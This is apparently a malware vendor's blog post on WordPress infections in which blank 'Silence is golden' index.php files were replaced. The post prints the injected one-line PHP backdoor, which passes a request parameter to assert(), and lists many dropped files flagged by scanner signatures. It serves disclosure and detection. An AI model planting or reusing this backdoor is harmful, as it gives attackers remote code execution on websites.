Silence is golden

Normally Silence is golden is all inside the index file. Just an empty file with no code and a single line comment saying “Silence is golden”. But wait, there exists nothing for no reason, there has got to be some reason for this file being empty ? The answer is security. If this index file is not there then anyone can access site’s directory listing by navigating to http://malware.expert/wp-content/ and he can get all the assets used in your site, that is not desirable at any condition. This also needs a bad configured server to server directory listing!

You can turn directory listing off using .htacess or server configuration.

PHP Malware

Today we found very old malware in WordPress installations, which activated and causing alarm. Timestamps are year of 2015 end and begin in 2016 with these files:

/wp-admin/includes/index.php: {HEX}Malware.Expert.generic.assert.13.UNOFFICIAL FOUND
/wp-admin/maint/index.php: {HEX}Malware.Expert.generic.assert.13.UNOFFICIAL FOUND
/wp-content/index.php: {HEX}Malware.Expert.generic.assert.13.UNOFFICIAL FOUND
/wp-content/plugins/index.php: {HEX}Malware.Expert.generic.assert.13.UNOFFICIAL FOUND
/wp-content/themes/index.php: {HEX}Malware.Expert.generic.assert.13.UNOFFICIAL FOUND
/wp-content/uploads/index.php: {HEX}Malware.Expert.generic.assert.13.UNOFFICIAL FOUND
/wp-includes/pomo/index.php: {HEX}Malware.Expert.generic.assert.13.UNOFFICIAL FOUND
/wp-includes/Text/index.php: {HEX}Malware.Expert.generic.assert.13.UNOFFICIAL FOUND

These files should be almost empty!

PHP Assert

If we looks the files, Itself file is very simple assert script to execute any code on server:

{HEX}Malware.Expert.generic.assert.13

// Silence is golden.
if(isset($_REQUEST['bot'])) assert(stripslashes($_REQUEST[bot]));

Attacker botnetwork try add more malware file’s to server:

{multi}Malware.Expert.cookie.global.2.signature

/wp-admin/includes/501.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/includes/200.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/includes/422.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/includes/424.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/includes/data.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/includes/509.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/includes/type.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-content/plugins/cherry-plugin/admin/images/type.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-content/plugins/cherry-plugin/includes/images/iconSweets/200.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-content/plugins/cherry-plugin/lib/php/501.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-content/plugins/maintenance/load/js/422.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-content/plugins/contact-form-7/modules/using.php: {HEX}Malware.Expert.generic.preg.replace.2.UNOFFICIAL FOUND
/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/509.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-content/plugins/all-in-one-seo-pack/images/data.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-content/uploads/2015/08/424.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/widgets.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/css/process.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/includes/200.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/includes/css.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/includes/db.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/includes/417.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/includes/process.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/includes/101.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-admin/includes/428.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-content/plugins/all-in-one-seo-pack/modules/images/428.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-content/plugins/easy-wp-smtp/js/css.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-content/plugins/easy-wp-smtp/js/200.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_basic_singlepic/static/417.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_basic_album/templates/101.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND
/wp-content/ngg/modules/photocrati-nextgen_addgallery_page/static/db.php: {multi}Malware.Expert.cookie.global.2.signature.UNOFFICIAL FOUND

Use Malware Expert Signatures to detect this malware from PHP files and clean them up.